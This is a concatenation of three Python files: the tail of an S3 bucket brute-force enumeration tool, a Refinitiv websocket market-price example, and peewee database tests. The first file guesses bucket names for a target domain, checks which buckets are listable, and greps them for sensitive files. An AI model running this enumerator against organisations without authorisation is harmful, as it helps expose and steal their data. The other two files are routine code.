> buckets = create_bucket_list("google.com", ["01"])
> buckets
["google.com", "google", "01.google.com", "01.google", "01-google",
"01google", "01google.com", "google-01", "google01"]
"""
perms = set()
# add domain
perms.add(domain)
rootword = ".".join(domain.split(".")[:-1])
# add rootword
perms.add(rootword)
for affix in affixes:
# affix.domain
perms.add("{}.{}".format(affix, domain))
# affix.rootword
perms.add("{}.{}".format(affix, rootword))
# affix-rootword
perms.add("{}-{}".format(affix, rootword))
# affixdomain
perms.add("{}{}".format(affix, domain))
# affixrootword
perms.add("{}{}".format(affix, rootword))
# rootword-affix
perms.add("{}-{}".format(rootword, affix))
# rootwordaffix
perms.add("{}{}".format(rootword, affix))
return perms
def bucket_worker():
"""
Wrapper to fetch items from queue and query s3
"""
while not bucket_q.empty():
region, bucket = bucket_q.get(timeout=5)
currcount = bucket_q_size - bucket_q.qsize()
percentile = round((float(currcount)/float(bucket_q_size))*100, 2)
print("Buckets searched: {}% ({}/{})".format(percentile, currcount, bucket_q_size), end="\r")
try:
ls_s3(region, bucket)
except CalledProcessError:
pass
bucket_q.task_done()
def ls_s3(region, domain):
"""
Takes a region and domain to query awscli and determine if the
bucket exists or is is listable. Pushes results to bucketlist
dictionary.
Args:
region (str): One of the AWS regions specified in settings.py
domain (str): Domain to target with s3://domain/
Returns:
None: No return value as it populates bucketlist
"""
fails = ["(InvalidBucketName)", "(NoSuchBucket)", "(PermanentRedirect)"]
exists = ["(AllAccessDisabled)", "(AccessDenied)", "(InvalidAccessKeyId)"]
cmd = "aws s3 ls s3://{}/ --region {}".format(domain, region)
# Redirect stdout to null
with open(devnull, 'w') as FNULL:
output = str(check_output(cmd.split(), stderr=FNULL))
logging.debug("Running command: {}".format(cmd))
logging.debug("Output was:\n{}".format(output))
if not any(x in output for x in fails):
info = (domain, region)
if any(x in output for x in exists):
bucketlist['exists'].append(info)
print("[E] {}{} {}on {}{} {}exists.\n".format(Y, domain, W, Y, region, W))
logging.info('[EXISTS] ' + cmd + "\n" + output + "\n" + "-"*10 + "\n")
else:
bucketlist['exists'].append(info)
bucketlist['listable'].append(info)
print("[L] {}{} {}on {}{} {}is listable.\n".format(G, domain, W, G, region, W))
logging.info("[LISTABLE] " + cmd + "\n" + output + "\n" + "-"*10 + "\n")
def main():
"""
Main function block that parses command line arguments.
"""
usage = "usage: %prog -d domain.com [-f keywords.txt -r region1,region2 -b" + \
"-t 30 -g keyword_file.txt -s [--subbrute]]"
parser = OptionParser(usage)
parser.add_option("-f", "--file", dest="filename", help="Read affixes from FILENAME.")
parser.add_option("-r", "--regions", dest="regions", default="all", help="Comma separated list " +
"of regions to query for bucket names. Default is all. Must be one or more of:" +
"{}".format(", ".join(S3_REGIONS)))
parser.add_option("-b", "--brute", dest="brute", action="store_true",
help="Use default brute force list in Buckets.txt")
parser.add_option("-t", "--threads", dest="threads", type="int", default=6,
help="Max number of threads, default is 6.")
parser.add_option("-g", "--grep", dest="grep",
help="Will recursively list files from buckets (when listable) and grep " +
"for keywords FILENAME. Ex: -g sensitive_keywords.txt")
parser.add_option("--sublist3r", dest="sublister", action="store_true", default=False,
help="Retrieve list of subdomains and use this to query against S3.")
parser.add_option("--subbrute", dest="subbrute", action="store_true", default=False,
help="Enable sublist3r's subbrute module when querying for subdomains.")
parser.add_option("-d", "--domain", dest="domain", help="Base domain to be queried against.")
parser.add_option("-v", "--verbose", dest="verbose", action="store_true", help="Enable debug messages in logs.")
(options, args) = parser.parse_args()
# Begin option parsing brick
# Set logging
if options.verbose:
logging.getLogger().setLevel(level=logging.DEBUG)
# Check regions passed are valid
regions = check_region_choice(options.regions)
# List of affixes to append to domain.com and domain in the form of
# affix.domain.com and affix-domain
affixes = []
# Subdomain var to keep track of sublist3r results.
subdomains = []
if not options.domain:
print("No argument -d (--domain) given. Please give a domain name, such as -d google.com")
exit(1)
# Read default keyword list if bruteforcing
if options.brute:
with open("Buckets.txt", "r") as f:
affixes += [x.strip() for x in f.readlines()]
# Read filename of user-provided keywords
if options.filename:
with open(options.filename, "r") as f:
affixes += [x.strip() for x in f.readlines()]
if options.sublister:
from Sublist3r import sublist3r
subdomains = sublist3r.main(options.domain, 30, None, None, False, verbose=True, enable_bruteforce=options.subbrute, engines=None)
buckets = create_bucket_list(options.domain, affixes=affixes)
for subdomain in subdomains:
subucks = create_bucket_list(subdomain, affixes=affixes)
buckets = buckets.union(subucks)
for region in regions:
for bucket in buckets:
bucket_q.put((region, bucket))
print("Generated {} bucket permutations. Beginning search across {} regions.".format(len(buckets), len(regions)))
print()
global bucket_q_size
bucket_q_size = bucket_q.qsize()
for i in range(options.threads):
t = Thread(target=bucket_worker, args=())
t.daemon = True
t.start()
bucket_q.join()
print()
print("[+] Results:")
print("\t{}Number of Buckets that Exist: {}{}".format(Y,len(bucketlist['exists']), W))
print("\t{}Number of Buckets that are Listable: {}{}".format(G,len(bucketlist['listable']), W))
if options.grep and bucketlist['listable']:
print("[.] Grepping for keywords in listable buckets from {}".format(options.grep))
with open(options.grep, 'r') as f:
keywords = [x.strip().lower() for x in f.readlines() if x.strip()]
for domain, region in bucketlist['listable']:
cmd = "aws s3 ls s3://{}/ --region {} --recursive".format(domain, region)
cmd = cmd.split(" ")
with open(devnull, 'w') as FNULL:
output = check_output(cmd, stderr=FNULL)
            # check_output returns bytes on Python 3; decode before comparing to the keywords.
            output = output.decode('utf-8', errors='ignore').lower()
if any(x in output for x in keywords):
print("[!] Found sensitive file on bucket {} in region {}".format(domain, region))
if __name__ == "__main__":
main()
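# ---------------------------------------------------------------------------
# Hedged usage example (not part of the original script); flags as defined by
# the OptionParser above, domain and region values are placeholders:
#   python3 buckethead.py -d example.com -b -t 10 -r us-east-1,us-west-2
#   python3 buckethead.py -d example.com -f keywords.txt --sublist3r --subbrute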
|
market_price_batch_view.py
|
#|-----------------------------------------------------------------------------
#| This source code is provided under the Apache 2.0 license --
#| and is provided AS IS with no warranty or guarantee of fit for purpose. --
#| See the project's LICENSE.md for details. --
#| Copyright (C) 2017-2020 Refinitiv. All rights reserved. --
#|-----------------------------------------------------------------------------
#!/usr/bin/env python
""" Simple example of outputting Market Price JSON data with Batch and View using Websockets """
import sys
import time
import getopt
import socket
import json
import websocket
import threading
from threading import Thread, Event
# Global Default Variables
hostname = '127.0.0.1'
port = '15000'
user = 'root'
app_id = '256'
position = socket.gethostbyname(socket.gethostname())
# Global Variables
web_socket_app = None
web_socket_open = False
def process_message(ws, message_json):
""" Parse at high level and output JSON of message """
message_type = message_json['Type']
if message_type == "Refresh":
if 'Domain' in message_json:
message_domain = message_json['Domain']
if message_domain == "Login":
process_login_response(ws, message_json)
elif message_type == "Ping":
pong_json = { 'Type':'Pong' }
ws.send(json.dumps(pong_json))
print("SENT:")
print(json.dumps(pong_json, sort_keys=True, indent=2, separators=(',', ':')))
def process_login_response(ws, message_json):
""" Send item request """
send_market_price_request(ws)
def send_market_price_request(ws):
""" Create and send simple Market Price batch request with view """
mp_req_json = {
'ID': 2,
'Key': {
'Name': [
'TRI.N',
'IBM.N',
'T.N'
],
},
'View': [
'BID',
'ASK',
'BIDSIZE'
]
}
ws.send(json.dumps(mp_req_json))
print("SENT:")
print(json.dumps(mp_req_json, sort_keys=True, indent=2, separators=(',', ':')))
def send_login_request(ws):
""" Generate a login request from command line data (or defaults) and send """
login_json = {
'ID': 1,
'Domain': 'Login',
'Key': {
'Name': '',
'Elements': {
'ApplicationId': '',
'Position': ''
}
}
}
login_json['Key']['Name'] = user
login_json['Key']['Elements']['ApplicationId'] = app_id
login_json['Key']['Elements']['Position'] = position
ws.send(json.dumps(login_json))
print("SENT:")
print(json.dumps(login_json, sort_keys=True, indent=2, separators=(',', ':')))
def on_message(ws, message):
""" Called when message received, parse message into JSON for processing """
print("RECEIVED: ")
message_json = json.loads(message)
print(json.dumps(message_json, sort_keys=True, indent=2, separators=(',', ':')))
for singleMsg in message_json:
process_message(ws, singleMsg)
def on_error(ws, error):
""" Called when websocket error has occurred """
print(error)
def on_close(ws, close_status_code, close_msg):
""" Called when websocket is closed """
global web_socket_open
web_socket_open = False
print("WebSocket Closed")
def on_open(ws):
""" Called when handshake is complete and websocket is open, send login """
print("WebSocket successfully connected!")
global web_socket_open
web_socket_open = True
send_login_request(ws)
if __name__ == "__main__":
# Get command line parameters
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["help", "hostname=", "port=", "app_id=", "user=", "position="])
except getopt.GetoptError:
print('Usage: market_price_batch_view.py [--hostname hostname] [--port port] [--app_id app_id] [--user user] [--position position] [--help]')
sys.exit(2)
    for opt, arg in opts:
        if opt == "--help":
            print('Usage: market_price_batch_view.py [--hostname hostname] [--port port] [--app_id app_id] [--user user] [--position position] [--help]')
            sys.exit(0)
        elif opt == "--hostname":
            hostname = arg
        elif opt == "--port":
            port = arg
        elif opt == "--app_id":
            app_id = arg
        elif opt == "--user":
            user = arg
        elif opt == "--position":
            position = arg
# Start websocket handshake
ws_address = "ws://{}:{}/WebSocket".format(hostname, port)
print("Connecting to WebSocket " + ws_address + " ...")
web_socket_app = websocket.WebSocketApp(ws_address, on_message=on_message,
on_error=on_error,
on_close=on_close,
subprotocols=['tr_json2'])
web_socket_app.on_open = on_open
# Event loop
wst = threading.Thread(target=web_socket_app.run_forever)
wst.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
web_socket_app.close()
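# ---------------------------------------------------------------------------
# Hedged usage example (not part of the original script); host/port are
# placeholders for your Refinitiv Real-Time / ADS websocket endpoint:
#   python market_price_batch_view.py --hostname 127.0.0.1 --port 15000 --user root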
|
db_tests.py
|
from itertools import permutations
try:
from Queue import Queue
except ImportError:
from queue import Queue
import re
import threading
from peewee import *
from peewee import Database
from peewee import FIELD
from peewee import attrdict
from peewee import sort_models
from .base import BaseTestCase
from .base import DatabaseTestCase
from .base import IS_CRDB
from .base import IS_MYSQL
from .base import IS_POSTGRESQL
from .base import IS_SQLITE
from .base import ModelTestCase
from .base import TestModel
from .base import db
from .base import db_loader
from .base import get_in_memory_db
from .base import requires_models
from .base import requires_postgresql
from .base_models import Category
from .base_models import Tweet
from .base_models import User
class TestDatabase(DatabaseTestCase):
database = db_loader('sqlite3')
def test_pragmas(self):
self.database.cache_size = -2048
self.assertEqual(self.database.cache_size, -2048)
self.database.cache_size = -4096
self.assertEqual(self.database.cache_size, -4096)
self.database.foreign_keys = 'on'
self.assertEqual(self.database.foreign_keys, 1)
self.database.foreign_keys = 'off'
self.assertEqual(self.database.foreign_keys, 0)
def test_timeout_semantics(self):
self.assertEqual(self.database.timeout, 5)
self.assertEqual(self.database.pragma('busy_timeout'), 5000)
self.database.timeout = 2.5
self.assertEqual(self.database.timeout, 2.5)
self.assertEqual(self.database.pragma('busy_timeout'), 2500)
self.database.close()
self.database.connect()
self.assertEqual(self.database.timeout, 2.5)
self.assertEqual(self.database.pragma('busy_timeout'), 2500)
def test_pragmas_deferred(self):
pragmas = (('journal_mode', 'wal'),)
db = SqliteDatabase(None, pragmas=pragmas)
self.assertEqual(db._pragmas, pragmas)
# Test pragmas preserved after initializing.
db.init(':memory:')
self.assertEqual(db._pragmas, pragmas)
db = SqliteDatabase(None)
self.assertEqual(db._pragmas, ())
# Test pragmas are set and subsequently overwritten.
db.init(':memory:', pragmas=pragmas)
self.assertEqual(db._pragmas, pragmas)
db.init(':memory:', pragmas=())
self.assertEqual(db._pragmas, ())
# Test when specified twice, the previous value is overwritten.
db = SqliteDatabase(None, pragmas=pragmas)
db.init(':memory:', pragmas=(('cache_size', -8000),))
self.assertEqual(db._pragmas, (('cache_size', -8000),))
def test_pragmas_as_dict(self):
pragmas = {'journal_mode': 'wal'}
pragma_list = [('journal_mode', 'wal')]
db = SqliteDatabase(':memory:', pragmas=pragmas)
self.assertEqual(db._pragmas, pragma_list)
# Test deferred databases correctly handle pragma dicts.
db = SqliteDatabase(None, pragmas=pragmas)
self.assertEqual(db._pragmas, pragma_list)
db.init(':memory:')
self.assertEqual(db._pragmas, pragma_list)
db.init(':memory:', pragmas={})
self.assertEqual(db._pragmas, [])
def test_pragmas_permanent(self):
db = SqliteDatabase(':memory:')
db.execute_sql('pragma foreign_keys=0')
self.assertEqual(db.foreign_keys, 0)
db.pragma('foreign_keys', 1, True)
self.assertEqual(db.foreign_keys, 1)
db.close()
db.connect()
self.assertEqual(db.foreign_keys, 1)
def test_context_settings(self):
class TestDatabase(Database):
field_types = {'BIGINT': 'TEST_BIGINT', 'TEXT': 'TEST_TEXT'}
operations = {'LIKE': '~', 'NEW': '->>'}
param = '$'
test_db = TestDatabase(None)
state = test_db.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'TEST_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], FIELD.INT)
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
self.assertEqual(state.operations['LIKE'], '~')
self.assertEqual(state.operations['NEW'], '->>')
self.assertEqual(state.operations['ILIKE'], 'ILIKE')
self.assertEqual(state.param, '$')
self.assertEqual(state.quote, '""')
test_db2 = TestDatabase(None, field_types={'BIGINT': 'XXX_BIGINT',
'INT': 'XXX_INT'})
state = test_db2.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'XXX_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], 'XXX_INT')
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
def test_connection_state(self):
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
self.database.close()
self.assertTrue(self.database.is_closed())
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
def test_db_context_manager(self):
self.database.close()
self.assertTrue(self.database.is_closed())
with self.database:
self.assertFalse(self.database.is_closed())
self.assertTrue(self.database.is_closed())
self.database.connect()
self.assertFalse(self.database.is_closed())
# Enter context with an already-open db.
with self.database:
self.assertFalse(self.database.is_closed())
# Closed after exit.
self.assertTrue(self.database.is_closed())
def test_connection_initialization(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
self.assertEqual(state['count'], 0)
conn = db.connection()
self.assertEqual(state['count'], 1)
# Since already connected, nothing happens here.
conn = db.connection()
self.assertEqual(state['count'], 1)
def test_connect_semantics(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
db.connect()
self.assertEqual(state['count'], 1)
self.assertRaises(OperationalError, db.connect)
self.assertEqual(state['count'], 1)
self.assertFalse(db.connect(reuse_if_open=True))
self.assertEqual(state['count'], 1)
with db:
self.assertEqual(state['count'], 1)
self.assertFalse(db.is_closed())
self.assertTrue(db.is_closed())
with db:
self.assertEqual(state['count'], 2)
def test_execute_sql(self):
self.database.execute_sql('CREATE TABLE register (val INTEGER);')
self.database.execute_sql('INSERT INTO register (val) VALUES (?), (?)',
(1337, 31337))
cursor = self.database.execute_sql(
'SELECT val FROM register ORDER BY val')
self.assertEqual(cursor.fetchall(), [(1337,), (31337,)])
self.database.execute_sql('DROP TABLE register;')
def test_bind_helpers(self):
db = get_in_memory_db()
alt_db = get_in_memory_db()
class Base(Model):
class Meta:
database = db
class A(Base):
a = TextField()
class B(Base):
b = TextField()
db.create_tables([A, B])
# Temporarily bind A to alt_db.
with alt_db.bind_ctx([A]):
self.assertFalse(A.table_exists())
self.assertTrue(B.table_exists())
self.assertTrue(A.table_exists())
self.assertTrue(B.table_exists())
alt_db.bind([A])
self.assertFalse(A.table_exists())
self.assertTrue(B.table_exists())
db.close()
alt_db.close()
def test_batch_commit(self):
class PatchCommitDatabase(SqliteDatabase):
commits = 0
def begin(self): pass
def commit(self):
self.commits += 1
db = PatchCommitDatabase(':memory:')
def assertBatches(n_objs, batch_size, n_commits):
accum = []
source = range(n_objs)
db.commits = 0
for item in db.batch_commit(source, batch_size):
accum.append(item)
self.assertEqual(accum, list(range(n_objs)))
self.assertEqual(db.commits, n_commits)
assertBatches(12, 1, 12)
assertBatches(12, 2, 6)
assertBatches(12, 3, 4)
assertBatches(12, 4, 3)
assertBatches(12, 5, 3)
assertBatches(12, 6, 2)
assertBatches(12, 7, 2)
assertBatches(12, 11, 2)
assertBatches(12, 12, 1)
assertBatches(12, 13, 1)
def test_server_version(self):
class FakeDatabase(Database):
server_version = None
def _connect(self):
return 1
def _close(self, conn):
pass
def _set_server_version(self, conn):
self.server_version = (1, 33, 7)
db = FakeDatabase(':memory:')
self.assertTrue(db.server_version is None)
db.connect()
self.assertEqual(db.server_version, (1, 33, 7))
db.close()
self.assertEqual(db.server_version, (1, 33, 7))
db.server_version = (1, 2, 3)
db.connect()
self.assertEqual(db.server_version, (1, 2, 3))
db.close()
def test_explicit_connect(self):
db = get_in_memory_db(autoconnect=False)
self.assertRaises(InterfaceError, db.execute_sql, 'pragma cache_size')
with db:
db.execute_sql('pragma cache_size')
self.assertRaises(InterfaceError, db.cursor)
class TestThreadSafety(ModelTestCase):
nthreads = 4
nrows = 10
requires = [User]
def test_multiple_writers(self):
def create_users(idx):
for i in range(idx * self.nrows, (idx + 1) * self.nrows):
User.create(username='u%d' % i)
threads = []
for i in range(self.nthreads):
threads.append(threading.Thread(target=create_users, args=(i,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(User.select().count(), self.nrows * self.nthreads)
def test_multiple_readers(self):
data = Queue()
def read_user_count(n):
for i in range(n):
data.put(User.select().count())
threads = []
for i in range(self.nthreads):
threads.append(threading.Thread(target=read_user_count,
args=(self.nrows,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(data.qsize(), self.nrows * self.nthreads)
class TestDeferredDatabase(BaseTestCase):
def test_deferred_database(self):
deferred_db = SqliteDatabase(None)
self.assertTrue(deferred_db.deferred)
class DeferredModel(Model):
class Meta:
database = deferred_db
self.assertRaises(Exception, deferred_db.connect)
query = DeferredModel.select()
self.assertRaises(Exception, query.execute)
deferred_db.init(':memory:')
self.assertFalse(deferred_db.deferred)
conn = deferred_db.connect()
self.assertFalse(deferred_db.is_closed())
DeferredModel._schema.create_all()
self.assertEqual(list(DeferredModel.select()), [])
deferred_db.init(None)
self.assertTrue(deferred_db.deferred)
# The connection was automatically closed.
self.assertTrue(deferred_db.is_closed())
class CatToy(TestModel):
description = TextField()
class Meta:
schema = 'huey'
@requires_postgresql
class TestSchemaNamespace(ModelTestCase):
requires = [CatToy]
def setUp(self):
with self.database:
self.execute('CREATE SCHEMA huey;')
super(TestSchemaNamespace, self).setUp()
def tearDown(self):
super(TestSchemaNamespace, self).tearDown()
with self.database:
self.execute('DROP SCHEMA huey;')
def test_schema(self):
toy = CatToy.create(description='fur mouse')
toy_db = CatToy.select().where(CatToy.id == toy.id).get()
self.assertEqual(toy.id, toy_db.id)
self.assertEqual(toy.description, toy_db.description)
class TestSqliteIsolation(ModelTestCase):
database = db_loader('sqlite3')
requires = [User]
def test_sqlite_isolation(self):
for username in ('u1', 'u2', 'u3'): User.create(username=username)
new_db = db_loader('sqlite3')
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 3)
self.assertEqual(User.select().count(), 3)
self.assertEqual(User.delete().execute(), 3)
with self.database.atomic():
User.create(username='u4')
User.create(username='u5')
# Second conn does not see the changes.
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Third conn does not see the changes.
new_db2 = db_loader('sqlite3')
curs = new_db2.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Original connection sees its own changes.
self.assertEqual(User.select().count(), 2)
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 2)
class UniqueModel(TestModel):
name = CharField(unique=True)
class IndexedModel(TestModel):
first = CharField()
last = CharField()
dob = DateField()
class Meta:
indexes = (
(('first', 'last', 'dob'), True),
(('first', 'last'), False),
)
class Note(TestModel):
content = TextField()
ts = DateTimeField()
status = IntegerField()
class Meta:
table_name = 'notes'
class Person(TestModel):
first = CharField()
last = CharField()
email = CharField()
class Meta:
indexes = (
(('last', 'first'), False),
)
class TestIntrospection(ModelTestCase):
requires = [Category, User, UniqueModel, IndexedModel, Person]
def test_table_exists(self):
self.assertTrue(self.database.table_exists(User._meta.table_name))
self.assertFalse(self.database.table_exists('nuggies'))
def test_get_tables(self):
tables = self.database.get_tables()
required = set(m._meta.table_name for m in self.requires)
self.assertTrue(required.issubset(set(tables)))
UniqueModel._schema.drop_all()
tables = self.database.get_tables()
self.assertFalse(UniqueModel._meta.table_name in tables)
def test_get_indexes(self):
indexes = self.database.get_indexes('unique_model')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('unique_model_pkey', 'PRIMARY')]
self.assertEqual(data, [
('unique_model_name', ['name'], True, 'unique_model')])
indexes = self.database.get_indexes('indexed_model')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('indexed_model_pkey', 'PRIMARY')]
self.assertEqual(sorted(data), [
('indexed_model_first_last', ['first', 'last'], False,
'indexed_model'),
('indexed_model_first_last_dob', ['first', 'last', 'dob'], True,
'indexed_model')])
# Multi-column index where columns are in different order than declared
# on the table.
indexes = self.database.get_indexes('person')
data = [(index.name, index.columns, index.unique)
for index in indexes
if index.name not in ('person_pkey', 'PRIMARY')]
self.assertEqual(data, [
('person_last_first', ['last', 'first'], False)])
def test_get_columns(self):
columns = self.database.get_columns('indexed_model')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('id', False, True, 'indexed_model'),
('first', False, False, 'indexed_model'),
('last', False, False, 'indexed_model'),
('dob', False, False, 'indexed_model')])
columns = self.database.get_columns('category')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('name', False, True, 'category'),
('parent_id', True, False, 'category')])
def test_get_primary_keys(self):
primary_keys = self.database.get_primary_keys('users')
self.assertEqual(primary_keys, ['id'])
primary_keys = self.database.get_primary_keys('category')
self.assertEqual(primary_keys, ['name'])
@requires_models(Note)
def test_get_views(self):
def normalize_view_meta(view_meta):
sql_ws_norm = re.sub(r'\n\s+', ' ', view_meta.sql.strip('; '))
return view_meta.name, (sql_ws_norm
.replace('`peewee_test`.', '')
.replace('`notes`.', '')
.replace('`', ''))
def assertViews(expected):
# Create two sample views.
self.database.execute_sql('CREATE VIEW notes_public AS '
'SELECT content, ts FROM notes '
'WHERE status = 1 ORDER BY ts DESC')
self.database.execute_sql('CREATE VIEW notes_deleted AS '
'SELECT content FROM notes '
'WHERE status = 9 ORDER BY id DESC')
try:
views = self.database.get_views()
normalized = sorted([normalize_view_meta(v) for v in views])
self.assertEqual(normalized, expected)
# Ensure that we can use get_columns to introspect views.
columns = self.database.get_columns('notes_deleted')
self.assertEqual([c.name for c in columns], ['content'])
columns = self.database.get_columns('notes_public')
self.assertEqual([c.name for c in columns], ['content', 'ts'])
finally:
self.database.execute_sql('DROP VIEW notes_public;')
self.database.execute_sql('DROP VIEW notes_deleted;')
# Unfortunately, all databases seem to represent VIEW definitions
# differently internally.
if IS_SQLITE:
assertViews([
('notes_deleted', ('CREATE VIEW notes_deleted AS '
'SELECT content FROM notes '
'WHERE status = 9 ORDER BY id DESC')),
('notes_public', ('CREATE VIEW notes_public AS '
'SELECT content, ts FROM notes '
'WHERE status = 1 ORDER BY ts DESC'))])
elif IS_MYSQL:
assertViews([
('notes_deleted',
('select content AS content from notes '
'where status = 9 order by id desc')),
('notes_public',
('select content AS content,ts AS ts from notes '
'where status = 1 order by ts desc'))])
elif IS_POSTGRESQL:
assertViews([
('notes_deleted',
('SELECT notes.content FROM notes '
'WHERE (notes.status = 9) ORDER BY notes.id DESC')),
('notes_public',
('SELECT notes.content, notes.ts FROM notes '
'WHERE (notes.status = 1) ORDER BY notes.ts DESC'))])
elif IS_CRDB:
assertViews([
('notes_deleted',
('SELECT content FROM peewee_test.public.notes '
'WHERE status = 9 ORDER BY id DESC')),
('notes_public',
('SELECT content, ts FROM peewee_test.public.notes '
'WHERE status = 1 ORDER BY ts DESC'))])
@requires_models(User, Tweet, Category)
def test_get_foreign_keys(self):
foreign_keys = self.database.get_foreign_keys('tweet')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
('user_id', 'users', 'id', 'tweet')])
foreign_keys = self.database.get_foreign_keys('category')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
('parent_id', 'category', 'name', 'category')])
class TestSortModels(BaseTestCase):
def test_sort_models(self):
class A(Model):
pass
class B(Model):
a = ForeignKeyField(A)
class C(Model):
b = ForeignKeyField(B)
class D(Model):
c = ForeignKeyField(C)
class E(Model):
pass
models = [A, B, C, D, E]
for list_of_models in permutations(models):
sorted_models = sort_models(list_of_models)
self.assertEqual(sorted_models, models)
class TestDBProxy(BaseTestCase):
def test_proxy_context_manager(self):
db = Proxy()
class User(Model):
username = TextField()
class Meta:
database = db
self.assertRaises(AttributeError, User.create_table)
sqlite_db = SqliteDatabase(':memory:')
db.initialize(sqlite_db)
User.create_table()
with db:
self.assertFalse(db.is_closed())
self.assertTrue(db.is_closed())
def test_db_proxy(self):
db = Proxy()
class BaseModel(Model):
class Meta:
database = db
class User(BaseModel):
username = TextField()
class Tweet(BaseModel):
user = ForeignKeyField(User, backref='tweets')
message = TextField()
sqlite_db = SqliteDatabase(':memory:')
db.initialize(sqlite_db)
self.assertEqual(User._meta.database.database, ':memory:')
self.assertEqual(Tweet._meta.database.database, ':memory:')
self.assertTrue(User._meta.database.is_closed())
self.assertTrue(Tweet._meta.database.is_closed())
sqlite_db.connect()
self.assertFalse(User._meta.database.is_closed())
self.assertFalse(Tweet._meta.database.is_closed())
sqlite_db.close()
def test_proxy_decorator(self):
db = DatabaseProxy()
@db.connection_context()
def with_connection():
self.assertFalse(db.is_closed())
@db.atomic()
def with_transaction():
self.assertTrue(db.in_transaction())
@db.manual_commit()
def with_manual_commit():
self.assertTrue(db.in_transaction())
db.initialize(SqliteDatabase(':memory:'))
with_connection()
self.assertTrue(db.is_closed())
with_transaction()
self.assertFalse(db.in_transaction())
with_manual_commit()
self.assertFalse(db.in_transaction())
class Data(TestModel):
key = TextField()
value = TextField()
class Meta:
schema = 'main'
class TestAttachDatabase(ModelTestCase):
database = db_loader('sqlite3')
requires = [Data]
def test_attach(self):
database = self.database
Data.create(key='k1', value='v1')
Data.create(key='k2', value='v2')
# Attach an in-memory cache database.
database.attach(':memory:', 'cache')
# Clone data into the in-memory cache.
class CacheData(Data):
class Meta:
schema = 'cache'
self.assertFalse(CacheData.table_exists())
CacheData.create_table(safe=False)
self.assertTrue(CacheData.table_exists())
(CacheData
.insert_from(Data.select(), fields=[Data.id, Data.key, Data.value])
.execute())
# Update the source data.
query = Data.update({Data.value: Data.value + '-x'})
self.assertEqual(query.execute(), 2)
# Verify the source data was updated.
query = Data.select(Data.key, Data.value).order_by(Data.key)
self.assertSQL(query, (
'SELECT "t1"."key", "t1"."value" '
'FROM "main"."data" AS "t1" '
'ORDER BY "t1"."key"'), [])
self.assertEqual([v for k, v in query.tuples()], ['v1-x', 'v2-x'])
# Verify the cached data reflects the original data, pre-update.
query = (CacheData
.select(CacheData.key, CacheData.value)
.order_by(CacheData.key))
self.assertSQL(query, (
'SELECT "t1"."key", "t1"."value" '
'FROM "cache"."cache_data" AS "t1" '
'ORDER BY "t1"."key"'), [])
self.assertEqual([v for k, v in query.tuples()], ['v1', 'v2'])
database.close()
# On re-connecting, the in-memory database will re-attached.
database.connect()
# Cache-Data table does not exist.
self.assertFalse(CacheData.table_exists())
# Double-check the sqlite master table.
curs = database.execute_sql('select * from cache.sqlite_master;')
self.assertEqual(curs.fetchall(), [])
# Because it's in-memory, the table needs to be re-created.
CacheData.create_table(safe=False)
self.assertEqual(CacheData.select().count(), 0)
# Original data is still there.
self.assertEqual(Data.select().count(), 2)
def test_attach_detach(self):
database = self.database
Data.create(key='k1', value='v1')
Data.create(key='k2', value='v2')
# Attach an in-memory cache database.
database.attach(':memory:', 'cache')
curs = database.execute_sql('select * from cache.sqlite_master')
self.assertEqual(curs.fetchall(), [])
self.assertFalse(database.attach(':memory:', 'cache'))
self.assertRaises(OperationalError, database.attach, 'foo.db', 'cache')
self.assertTrue(database.detach('cache'))
self.assertFalse(database.detach('cache'))
self.assertRaises(OperationalError, database.execute_sql,
'select * from cache.sqlite_master')
def test_sqlite_schema_support(self):
class CacheData(Data):
class Meta:
schema = 'cache'
# Attach an in-memory cache database and create the cache table.
self.database.attach(':memory:', 'cache')
CacheData.create_table()
tables = self.database.get_tables()
self.assertEqual(tables, ['data'])
tables = self.database.get_tables(schema='cache')
self.assertEqual(tables, ['cache_data'])
class TestDatabaseConnection(DatabaseTestCase):
def test_is_connection_usable(self):
# Ensure a connection is open.
conn = self.database.connection()
self.assertTrue(self.database.is_connection_usable())
self.database.close()
self.assertFalse(self.database.is_connection_usable())
self.database.connect()
self.assertTrue(self.database.is_connection_usable())
@requires_postgresql
def test_is_connection_usable_pg(self):
self.database.execute_sql('drop table if exists foo')
self.database.execute_sql('create table foo (data text not null)')
self.assertTrue(self.database.is_connection_usable())
with self.assertRaises(IntegrityError):
self.database.execute_sql('insert into foo (data) values (NULL)')
self.assertFalse(self.database.is_closed())
self.assertFalse(self.database.is_connection_usable())
self.database.rollback()
self.assertTrue(self.database.is_connection_usable())
curs = self.database.execute_sql('select * from foo')
self.assertEqual(list(curs), [])
self.database.execute_sql('drop table foo')
class TestExceptionWrapper(ModelTestCase):
database = get_in_memory_db()
requires = [User]
